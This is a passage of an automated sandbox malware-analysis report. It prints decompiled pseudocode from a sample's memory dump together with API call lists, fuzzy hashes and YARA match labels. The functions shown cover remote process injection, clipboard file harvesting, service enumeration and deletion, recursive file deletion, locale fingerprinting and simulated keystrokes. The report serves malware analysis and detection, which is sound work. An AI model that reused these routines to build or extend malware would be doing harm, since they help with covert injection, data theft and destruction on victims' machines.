                                    				} else {
                                    					do {
                                    						E240132EC( &_v12, 0x104,  &(_t102->cFileName));
                                    						E24013480(_v12, 0x24016190);
                                    						if(_t111 != 0) {
                                    							E24013480(_v12, 0x2401619c);
                                    							if(_t111 != 0) {
                                    								_t63 = _t102->dwFileAttributes;
                                    								if(_t63 == 0xffffffff || (_t63 & 0x00000010) == 0) {
                                    									_t64 = 0;
                                    								} else {
                                    									_t64 = 1;
                                    								}
                                    								_t114 = _t64;
                                    								if(_t64 != 0) {
                                    									E24013388( &_v344, _v12, _v8);
                                    									L1();
                                    								} else {
                                    									E24013388( &_v12, _v12, _v8);
                                    									E24013274( &_v340, E24013534(_v12));
                                    									E24016634(_v340, 0, _t102, _t104, _t114);
                                    								}
                                    							}
                                    						}
                                    						_t55 = FindNextFileA(_t104, _t102);
                                    						asm("sbb eax, eax");
                                    					} while (_t55 + 1 != 0);
                                    					FindClose(_t104);
                                    					if(RemoveDirectoryA(E24013534(_v8)) != 0) {
                                    					}
                                    					goto L16;
                                    				}
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016160), ref: 24016067
                                    • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,24016160), ref: 24016108
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401611C
                                    • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,24016160), ref: 2401612A
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Find$File$CloseDirectoryFirstNextRemove
                                    • String ID: *.*
                                    • API String ID: 81111410-438819550
                                    • Opcode ID: accb25b3ce662f110da8a1d23776bc648455d97cc57a3dd94dce0c7b2416f73f
                                    • Instruction ID: ea82d53e2061035ead515fc50307a785f75e63861739c87cf3ac3225c7432ef8
                                    • Opcode Fuzzy Hash: accb25b3ce662f110da8a1d23776bc648455d97cc57a3dd94dce0c7b2416f73f
                                    • Instruction Fuzzy Hash: 4D318134900508ABFF11DBE4CD40A9EB7F4AF95758F5049B4E40CA7259DB70AFC18A51
                                    Uniqueness
                                    • Uniqueness Score: -1.00%

                                    C-Code - Quality: 49%
                                    			E2403CDE0(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                    				char _v5;
                                    				struct HWND__* _v12;
                                    				char _v273;
                                    				char _v280;
                                    				void* _t19;
                                    				intOrPtr* _t30;
                                    				intOrPtr _t35;
                                    				void* _t39;
                                    				void* _t42;
                                    				void* _t43;
                                    				void* _t45;
                                    				void* _t46;
                                    				intOrPtr _t47;
                                    
                                    				_t45 = _t46;
                                    				_t47 = _t46 + 0xfffffeec;
                                    				_v280 = 0;
                                    				_t30 = __eax;
                                    				_push(_t45);
                                    				_push(0x2403cedc);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t47;
                                    				_v5 = 0;
                                    				E24013088(__eax);
                                    				OpenClipboard(0);
                                    				_push(_t45);
                                    				_push(0x2403cebc);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t47;
                                    				_t19 = GetClipboardData(0xf);
                                    				_t39 = _t19;
                                    				if(_t39 != 0) {
                                    					_push(0);
                                    					_push(0);
                                    					_push(0xffffffff);
                                    					_push(_t39);
                                    					L2403CD98();
                                    					E24013088(_t30);
                                    					_t42 = _t19 - 1;
                                    					if(_t42 >= 0) {
                                    						_t43 = _t42 + 1;
                                    						_v12 = 0;
                                    						do {
                                    							_v273 = 0;
                                    							_push(0x105);
                                    							_push( &_v273);
                                    							_push(_v12);
                                    							_push(_t39);
                                    							L2403CD98();
                                    							_push( *_t30);
                                    							E240132EC( &_v280, 0x105,  &_v273);
                                    							_push(_v280);
                                    							_push(0x2403cef8);
                                    							E240133FC();
                                    							_v12 =  &(_v12->i);
                                    							_t43 = _t43 - 1;
                                    						} while (_t43 != 0);
                                    					}
                                    					_v5 = 1;
                                    				}
                                    				_pop(_t35);
                                    				 *[fs:eax] = _t35;
                                    				_push(0x2403cec3);
                                    				return CloseClipboard();
                                    			}

                                    APIs
                                    • OpenClipboard.USER32(00000000), ref: 2403CE11
                                    • GetClipboardData.USER32(0000000F), ref: 2403CE26
                                    • DragQueryFile.SHELL32(00000000,000000FF,00000000,00000000), ref: 2403CE38
                                    • DragQueryFile.SHELL32(00000000,00000000,00000000,00000105), ref: 2403CE6B
                                    • CloseClipboard.USER32 ref: 2403CEB6
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Clipboard$DragFileQuery$CloseDataOpen
                                    • String ID:
                                    • API String ID: 3062564445-0
                                    • Opcode ID: 89d7ab5c36e8bef0298f4bdbb901d5694577ac4b5db60d6a6bd805a1f90c9232
                                    • Instruction ID: 6afa1e5f840c5f13e8d2656de05551d97ae6aca7fa8e44f6212d0a2ea933ffdf
                                    • Opcode Fuzzy Hash: 89d7ab5c36e8bef0298f4bdbb901d5694577ac4b5db60d6a6bd805a1f90c9232
                                    • Instruction Fuzzy Hash: 4D2129325086587FFB129B648C51FDF7EB8DB5AB44F4140F4F508E6288D6B59AC08A61
                                    Uniqueness
                                    • Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E2403C950(char __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				void* _t20;
                                    				intOrPtr _t24;
                                    				void* _t29;
                                    				intOrPtr _t32;
                                    
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t32);
                                    				_push(0x2403c9cf);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t32;
                                    				_t20 = OpenSCManagerA(0, 0, 0xf003f);
                                    				if(_t20 > 0) {
                                    					_t29 = OpenServiceA(_t20, E24013534(_v8), 0x10000);
                                    					if(_t29 > 0) {
                                    						if(DeleteService(_t29) != 0) {
                                    						}
                                    						CloseServiceHandle(_t29);
                                    					}
                                    					CloseServiceHandle(_t20);
                                    				}
                                    				_pop(_t24);
                                    				 *[fs:eax] = _t24;
                                    				_push(0x2403c9d6);
                                    				return E24013088( &_v8);
                                    			}

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C97B
                                    • OpenServiceA.ADVAPI32(00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C995
                                    • DeleteService.ADVAPI32(00000000,00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C9A1
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C9AE
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00010000,00000000,00000000,000F003F,00000000,2403C9CF), ref: 2403C9B4
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Similarity
                                    • API ID: Service$CloseHandleOpen$DeleteManager
                                    • String ID:
                                    • API String ID: 204194956-0
                                    • Opcode ID: 75e6500ca8f3d60347d72bb4557b582b81b63e78b1e7c3c7ed418e0c7b65f707
                                    • Instruction ID: 109eee448292ec38bb8608b85cf9aad0d8ac39adf5294ffb4019cc38e55fe2a7
                                    • Opcode Fuzzy Hash: 75e6500ca8f3d60347d72bb4557b582b81b63e78b1e7c3c7ed418e0c7b65f707
                                    • Instruction Fuzzy Hash: 6A01F4726087047BF712DA318C59F2F7EECEF65B58F020472F900E6188DAB08EC09460
                                    Uniqueness
                                    • Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E2403EAA0(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, void** _a16) {
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				void** _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _t29;
                                    				intOrPtr _t32;
                                    				intOrPtr _t42;
                                    				struct HWND__* _t47;
                                    				intOrPtr* _t48;
                                    				void** _t49;
                                    
                                    				_t42 = _a8;
                                    				_t47 = _a4;
                                    				_v8 = 0;
                                    				if(_t42 == 0x81) {
                                    					_t49 = _a16;
                                    					SetPropA(_t47, "OBJECT",  *_t49);
                                    					 *( *_t49 + 4) = _t47;
                                    				}
                                    				_v24 = _t42;
                                    				_v20 = _a12;
                                    				_v16 = _a16;
                                    				_v12 = 0;
                                    				_t48 = GetPropA(_t47, "OBJECT");
                                    				if(_t42 != 2) {
                                    					if(_t48 != 0) {
                                    						 *((intOrPtr*)( *_t48 - 0x14))();
                                    					}
                                    					_t29 = _v12;
                                    					if(_t29 != 0) {
                                    						_v8 = _t29;
                                    					} else {
                                    						_push(_a16);
                                    						_t32 = _a12;
                                    						_push(_t32);
                                    						_push(_t42);
                                    						_push(_t47);
                                    						L24015258();
                                    						_v8 = _t32;
                                    					}
                                    				} else {
                                    					if(_t48 != 0) {
                                    						 *((intOrPtr*)( *_t48 - 0x14))();
                                    						E24012688(_t48);
                                    					}
                                    				}
                                    				return _v8;
                                    			}

                                    APIs
                                    • SetPropA.USER32(?,OBJECT,00000000), ref: 2403EAC8
                                    • GetPropA.USER32(?,OBJECT), ref: 2403EAEC
                                    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 2403EB30
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Prop$NtdllProc_Window
                                    • String ID: OBJECT
                                    • API String ID: 1456104087-1481993322
                                    • Opcode ID: e18fea9311f87190c7643cae5032746983b8a6cb531c8355fb7cdca1551715fd
                                    • Instruction ID: dbfbc86dabd32b62de994fff43fd31fbc4e5809ef2df2a8c9930a013adff8ffa
                                    • Opcode Fuzzy Hash: e18fea9311f87190c7643cae5032746983b8a6cb531c8355fb7cdca1551715fd
                                    • Instruction Fuzzy Hash: 4C212E75A01219EFD701CF69C9809AFBFF8EF49650B5042A9E805E7301D7709E408BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 67%
                                    			E240547C8(void* __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				intOrPtr _v12;
                                    				char _v13;
                                    				intOrPtr _v20;
                                    				void* _v24;
                                    				long _v28;
                                    				intOrPtr _v36;
                                    				long _v44;
                                    				void* _v48;
                                    				void* _t42;
                                    				void* _t57;
                                    				intOrPtr _t64;
                                    				intOrPtr _t67;
                                    				intOrPtr _t68;
                                    				void* _t74;
                                    				void* _t76;
                                    				void* _t79;
                                    				intOrPtr* _t80;
                                    
                                    				_t80 = _t79 + 0xffffffd4;
                                    				_v12 = __edx;
                                    				_v8 = __eax;
                                    				_t64 =  *0x24053e90; // 0x24053e94
                                    				E240139CC( &_v48, _t64);
                                    				_push(_t79);
                                    				_push(0x240548d9);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t80;
                                    				_v13 = 0;
                                    				_push(0);
                                    				_push(_v12);
                                    				asm("cdq");
                                    				asm("adc edx, [esp+0x4]");
                                    				_t74 =  *((intOrPtr*)(_v12 + 0x3c)) +  *_t80;
                                    				_t76 = 0x10000000;
                                    				do {
                                    					_t76 = _t76 + 0x10000;
                                    					_t57 = VirtualAlloc( *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40);
                                    					if(_t57 != 0) {
                                    						VirtualFree(_t57, 0, 0x8000);
                                    						_t57 = VirtualAllocEx(_v8,  *((intOrPtr*)(_t74 + 0x34)) + _t76,  *(_t74 + 0x50), 0x3000, 0x40);
                                    					}
                                    				} while (_t57 == 0 && _t76 <= 0x30000000);
                                    				E24054594(_v8, _t57, _v12, _t57, _t74, _t76,  &_v48);
                                    				_t42 = _v48;
                                    				if(_t42 != 0) {
                                    					_v24 = _t42;
                                    					_v20 = _v36;
                                    					WriteProcessMemory(_v8, _t57, _t42, _v44,  &_v28);
                                    					if(E24053F80(_v8,  &_v24, E240547A0, 0, 8) != 0) {
                                    						_v13 = 1;
                                    					}
                                    				}
                                    				_pop(_t67);
                                    				 *[fs:eax] = _t67;
                                    				_push(0x240548e0);
                                    				_t68 =  *0x24053e90; // 0x24053e94
                                    				return E24013A90( &_v48, _t68);
                                    			}

                                    APIs
                                    • VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 2405482D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00003000,00000040), ref: 24054840
                                    • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,00000000,00000000,00008000,?,?,00003000,00000040), ref: 2405485A
                                    • WriteProcessMemory.KERNEL32(?,00000000,?,?,?,?,?,?,00003000,00000040), ref: 2405489C
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Alloc$FreeMemoryProcessWrite
                                    • String ID:
                                    • API String ID: 2022580353-0
                                    • Opcode ID: d5f8063f5f91ac3d7fc71000dfc2d61ec1e27825b76a9bca2b070aaf16389528
                                    • Instruction ID: f9a1d8d58b9378a61539a176628ee232f011176e0f68df887de7f00a52302c69
                                    • Opcode Fuzzy Hash: d5f8063f5f91ac3d7fc71000dfc2d61ec1e27825b76a9bca2b070aaf16389528
                                    • Instruction Fuzzy Hash: F1311B71A00245ABEB41CBA9CC81FDEB7F9FB98704F508065E904F7654D674EA508BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E2403D390(void* __eax) {
                                    				short _v6;
                                    				short _v8;
                                    				struct _FILETIME _v16;
                                    				struct _WIN32_FIND_DATAA _v336;
                                    				void* _t16;
                                    
                                    				_t16 = FindFirstFileA(E24013534(__eax),  &_v336);
                                    				if(_t16 == 0xffffffff) {
                                    					L3:
                                    					_v8 = 0xffffffff;
                                    				} else {
                                    					FindClose(_t16);
                                    					if((_v336.dwFileAttributes & 0x00000010) != 0) {
                                    						goto L3;
                                    					} else {
                                    						FileTimeToLocalFileTime( &(_v336.ftLastWriteTime),  &_v16);
                                    						if(FileTimeToDosDateTime( &_v16,  &_v6,  &_v8) == 0) {
                                    							goto L3;
                                    						}
                                    					}
                                    				}
                                    				return _v8;
                                    			}

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 2403D3AB
                                    • FindClose.KERNEL32(00000000,00000000,?), ref: 2403D3B6
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 2403D3CF
                                    • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 2403D3E0
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: FileTime$Find$CloseDateFirstLocal
                                    • String ID:
                                    • API String ID: 2659516521-0
                                    • Opcode ID: 9143006eb41c45353f1fb9a1df9d4207309235395cb7662632e7840d83c7f675
                                    • Instruction ID: 3ce7e5e080b836565f60ce50e2410eadfe5ebaa2cb47f093869fe9eb88b8ed4d
                                    • Opcode Fuzzy Hash: 9143006eb41c45353f1fb9a1df9d4207309235395cb7662632e7840d83c7f675
                                    • Instruction Fuzzy Hash: FEF012B6D0020C66DB11DBE58C84ACFB7EC5F04214F5006A6E559E22D5EB34AB845BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 65%
                                    			E2403C9E0(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                    				void* _v8;
                                    				int _v12;
                                    				int _v16;
                                    				int _v20;
                                    				struct _ENUM_SERVICE_STATUS _v18452;
                                    				char _v18456;
                                    				char _v18460;
                                    				char _v18464;
                                    				char _v18468;
                                    				char _v18472;
                                    				char _v18476;
                                    				void* _t37;
                                    				intOrPtr* _t77;
                                    				intOrPtr _t83;
                                    				void* _t99;
                                    				void* _t100;
                                    				intOrPtr* _t102;
                                    				void* _t104;
                                    				void* _t105;
                                    
                                    				_t104 = _t105;
                                    				_push(__eax);
                                    				_t37 = 4;
                                    				do {
                                    					_t105 = _t105 + 0xfffff004;
                                    					_push(_t37);
                                    					_t37 = _t37 - 1;
                                    				} while (_t37 != 0);
                                    				_v18472 = 0;
                                    				_v18476 = 0;
                                    				_v18464 = 0;
                                    				_v18468 = 0;
                                    				_v18460 = 0;
                                    				_v18456 = 0;
                                    				_t102 = _v8;
                                    				_push(_t104);
                                    				_push(0x2403cbbc);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t105 + 0xfffff7dc;
                                    				E24013088(_t102);
                                    				_v8 = OpenSCManagerA(0, 0, 5);
                                    				if(_v8 == 0) {
                                    					L16:
                                    					_pop(_t83);
                                    					 *[fs:eax] = _t83;
                                    					_push(0x2403cbc3);
                                    					return E240130AC( &_v18476, 6);
                                    				}
                                    				_v20 = 0;
                                    				do {
                                    					EnumServicesStatusA(_v8, 0x13f, 3,  &_v18452, 0x4800,  &_v12,  &_v16,  &_v20);
                                    					_t99 = _v16 - 1;
                                    					if(_t99 < 0) {
                                    						goto L13;
                                    					}
                                    					_t100 = _t99 + 1;
                                    					_t77 =  &_v18452;
                                    					do {
                                    						if( *_t77 != 0) {
                                    							_push( *_t102);
                                    							E24013274( &_v18456,  *_t77);
                                    							_push(_v18456);
                                    							_push(0x2403cbe0);
                                    							E240133FC();
                                    						} else {
                                    							E24013344(_t102, 0x2403cbd4);
                                    						}
                                    						_t113 =  *((intOrPtr*)(_t77 + 4));
                                    						if( *((intOrPtr*)(_t77 + 4)) != 0) {
                                    							_push( *_t102);
                                    							E24013274( &_v18460,  *((intOrPtr*)(_t77 + 4)));
                                    							_push(_v18460);
                                    							_push(0x2403cbe0);
                                    							E240133FC();
                                    						} else {
                                    							E24013344(_t102, 0x2403cbd4);
                                    						}
                                    						_push( *_t102);
                                    						E24013274( &_v18468,  *_t77);
                                    						E2403C6E4(_v18468, _t77,  &_v18464, _t102, _t113);
                                    						_push(_v18464);
                                    						_push(0x2403cbd4);
                                    						E240133FC();
                                    						_push( *_t102);
                                    						E24013274( &_v18476,  *_t77);
                                    						E2403C858(_v18476, _t77, 0, 0, _t100, _t102, _t113,  &_v18472);
                                    						_push(_v18472);
                                    						_push(0x2403cbd4);
                                    						E240133FC();
                                    						_t77 = _t77 + 0x24;
                                    						_t100 = _t100 - 1;
                                    					} while (_t100 != 0);
                                    					L13:
                                    				} while (_v12 != 0);
                                    				if(_v8 > 0) {
                                    					CloseServiceHandle(_v8);
                                    				}
                                    				goto L16;
                                    			}

                                    APIs
                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000005,00000000,2403CBBC), ref: 2403CA42
                                    • EnumServicesStatusA.ADVAPI32(00000000,0000013F,00000003,?,00004800,?,?,?), ref: 2403CA7C
                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000005,00000000,2403CBBC), ref: 2403CB99
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumHandleManagerOpenServiceServicesStatus
                                    • String ID:
                                    • API String ID: 236840872-0
                                    • Opcode ID: 2f159192f6f5311a94a8c082e9fddeb7910a1b84486832ce6392bffb3023f4ba
                                    • Instruction ID: 3208abff47b8b951bbf0e3629c18cb63830b94082d3141814c16408f3c07f88e
                                    • Opcode Fuzzy Hash: 2f159192f6f5311a94a8c082e9fddeb7910a1b84486832ce6392bffb3023f4ba
                                    • Instruction Fuzzy Hash: 635152B29041589BEF11DB64CC40B8DBFF9EF58704F10C9E69208E6258DAB19FC18F55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E24018DE0(void* __eax, void* __ebx, void* __eflags) {
                                    				char _v14;
                                    				char _v78;
                                    				char _v142;
                                    				char _v148;
                                    				char _v160;
                                    				char _v172;
                                    				char _v176;
                                    				char _v180;
                                    				char _v184;
                                    				intOrPtr _t92;
                                    				void* _t96;
                                    				void* _t98;
                                    
                                    				_t98 = __eflags;
                                    				_v180 = 0;
                                    				_v184 = 0;
                                    				_v176 = 0;
                                    				_v148 = 0;
                                    				_push(_t96);
                                    				_push(0x24018f57);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t96 + 0xffffff4c;
                                    				GetKeyboardLayoutNameA( &_v14);
                                    				E24011BD8( &_v160, 0x24018f64);
                                    				E240122F4( &_v172, 0xa,  &_v14);
                                    				E24011BA8( &_v160, 0xb,  &_v172);
                                    				E240132E0( &_v148,  &_v160, _t98);
                                    				GetLocaleInfoA(E240158F0(_v148, _t98), 0x1001,  &_v78, 0x40);
                                    				E24011BD8( &_v160, 0x24018f64);
                                    				E240122F4( &_v172, 0xa,  &_v14);
                                    				E24011BA8( &_v160, 0xb,  &_v172);
                                    				E240132E0( &_v176,  &_v160, _t98);
                                    				GetLocaleInfoA(E240158F0(_v176, _t98), 2,  &_v142, 0x40);
                                    				E240132EC( &_v180, 0x40,  &_v78);
                                    				_push(_v180);
                                    				_push(0x24018f70);
                                    				E240132EC( &_v184, 0x40,  &_v142);
                                    				_push(_v184);
                                    				_push(E24018F7C);
                                    				E240133FC();
                                    				_pop(_t92);
                                    				 *[fs:eax] = _t92;
                                    				_push(E24018F5E);
                                    				E240130AC( &_v184, 3);
                                    				return E24013088( &_v148);
                                    			}

                                    APIs
                                    • GetKeyboardLayoutNameA.USER32(?), ref: 24018E18
                                    • GetLocaleInfoA.KERNEL32(00000000,00001001,?,00000040,00000000,24018F57), ref: 24018E7B
                                    • GetLocaleInfoA.KERNEL32(00000000,00000002,?,00000040,00000000,00001001,?,00000040,00000000,24018F57), ref: 24018EDE
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: InfoLocale$KeyboardLayoutName
                                    • String ID:
                                    • API String ID: 3953094008-0
                                    • Opcode ID: ea93da08cd9a7f21511e1b6b6dbd34542b1c10a26204852ee03e686afca071c4
                                    • Instruction ID: 398bf9705c7740406d98461d9edb960ea2f3f4af33ccd85f9738524941cd585b
                                    • Opcode Fuzzy Hash: ea93da08cd9a7f21511e1b6b6dbd34542b1c10a26204852ee03e686afca071c4
                                    • Instruction Fuzzy Hash: 2B311B71A002199FEF14DB61CC80FCDB3BAAF58304F4084E5960CA7159EB75AF8A8E55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 40%
                                    			E2404092C(intOrPtr* __eax, void* __ebx, void* __edx, void* __esi, void* __eflags) {
                                    				char _v8;
                                    				char _v12;
                                    				CHAR* _t24;
                                    				void* _t25;
                                    				intOrPtr _t32;
                                    				intOrPtr* _t35;
                                    				intOrPtr _t38;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_t35 = __eax;
                                    				_push(_t38);
                                    				_push(0x240409c9);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t38;
                                    				E24013088(__eax);
                                    				_t24 = E24011344(0x200);
                                    				GetLogicalDriveStringsA(0x200, _t24);
                                    				SetErrorMode(1);
                                    				while( *_t24 != 0) {
                                    					_push( *_t35);
                                    					E24013274( &_v8, _t24);
                                    					_push(_v8);
                                    					_push(0x240409e0);
                                    					E240158BC( &_v12, _t25, 0, GetDriveTypeA(_t24), 0);
                                    					_push(_v12);
                                    					_push(0x240409e0);
                                    					E240133FC();
                                    					_t24 =  &(_t24[4]);
                                    				}
                                    				_pop(_t32);
                                    				 *[fs:eax] = _t32;
                                    				_push(0x240409d0);
                                    				return E240130AC( &_v12, 2);
                                    			}

                                    0x2404092f
                                    0x24040931
                                    0x24040935
                                    0x24040939
                                    0x2404093a
                                    0x2404093f
                                    0x24040942
                                    0x24040947
                                    0x24040956
                                    0x2404095e
                                    0x24040965
                                    0x240409a9
                                    0x2404096c
                                    0x24040973
                                    0x24040978
                                    0x2404097b
                                    0x2404098d
                                    0x24040992
                                    0x24040995
                                    0x240409a1
                                    0x240409a6
                                    0x240409a6
                                    0x240409b0
                                    0x240409b3
                                    0x240409b6
                                    0x240409c8

                                    APIs
                                    • GetLogicalDriveStringsA.KERNEL32(00000200,00000000), ref: 2404095E
                                    • SetErrorMode.KERNEL32(00000001,00000000,240409C9,?,?,?,00000000,00000000), ref: 24040965
                                    • GetDriveTypeA.KERNEL32(00000000,240409E0,?,?,00000001,00000000,240409C9,?,?,?,00000000,00000000), ref: 24040981
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Drive$ErrorLogicalModeStringsType
                                    • String ID:
                                    • API String ID: 2040483995-0
                                    • Opcode ID: dc2863e7846e029cd5b70a756a15143f719e1668bcdb54b0c8e55056709f6d43
                                    • Instruction ID: e6463fc05f44022da83336afd5d5cc247bb4ca06b09e5ea39e8653920cccdc44
                                    • Opcode Fuzzy Hash: dc2863e7846e029cd5b70a756a15143f719e1668bcdb54b0c8e55056709f6d43
                                    • Instruction Fuzzy Hash: 5401D471A042047FFB129AE0DC91F6E769CDB95704F510475F604B6689D9749EC04AA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 37%
                                    			E24044968(char __eax, void* __ebx, void* __ecx, void* __eflags) {
                                    				char _v8;
                                    				char _v12;
                                    				void* _t33;
                                    				intOrPtr _t46;
                                    				void* _t50;
                                    
                                    				_v12 = 0;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t50);
                                    				_push(0x24044a1a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t50 + 0xfffffff8;
                                    				while(E24013674(0x24044a30, _v8) > 0) {
                                    					__eflags = E24013674(0x24044a30, _v8) - 1;
                                    					E24013590(_v8, E24013674(0x24044a30, _v8) - 1, 1,  &_v12);
                                    					_t33 = E240158F0(_v12, __eflags);
                                    					E240135D0( &_v8, E24013674(0x24044a30, _v8), 1);
                                    					_push(0);
                                    					_push(0);
                                    					_push(1);
                                    					_push(_t33);
                                    					L24015448();
                                    					_push(0);
                                    					_push(2);
                                    					_push(1);
                                    					_push(_t33);
                                    					L24015448();
                                    				}
                                    				_pop(_t46);
                                    				 *[fs:eax] = _t46;
                                    				_push(0x24044a21);
                                    				return E240130AC( &_v12, 2);
                                    			}

                                    0x24044971
                                    0x24044974
                                    0x2404497a
                                    0x24044981
                                    0x24044982
                                    0x24044987
                                    0x2404498a
                                    0x240449ee
                                    0x240449a2
                                    0x240449ab
                                    0x240449b8
                                    0x240449d1
                                    0x240449d6
                                    0x240449d8
                                    0x240449da
                                    0x240449dc
                                    0x240449dd
                                    0x240449e2
                                    0x240449e4
                                    0x240449e6
                                    0x240449e8
                                    0x240449e9
                                    0x240449e9
                                    0x24044a01
                                    0x24044a04
                                    0x24044a07
                                    0x24044a19

                                    APIs
                                    • keybd_event.USER32(00000000,00000001,00000000,00000000), ref: 240449DD
                                    • keybd_event.USER32(00000000,00000001,00000002,00000000), ref: 240449E9
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: keybd_event
                                    • String ID:
                                    • API String ID: 2665452162-0
                                    • Opcode ID: 531780a9b425e5e394f734af701528f3fe364af5c59b0903d52d1c6e01404d02
                                    • Instruction ID: 18c1be857b599704aa82fbad4382f21e07f79cfa042db71c8f6a274bd4253aff
                                    • Opcode Fuzzy Hash: 531780a9b425e5e394f734af701528f3fe364af5c59b0903d52d1c6e01404d02
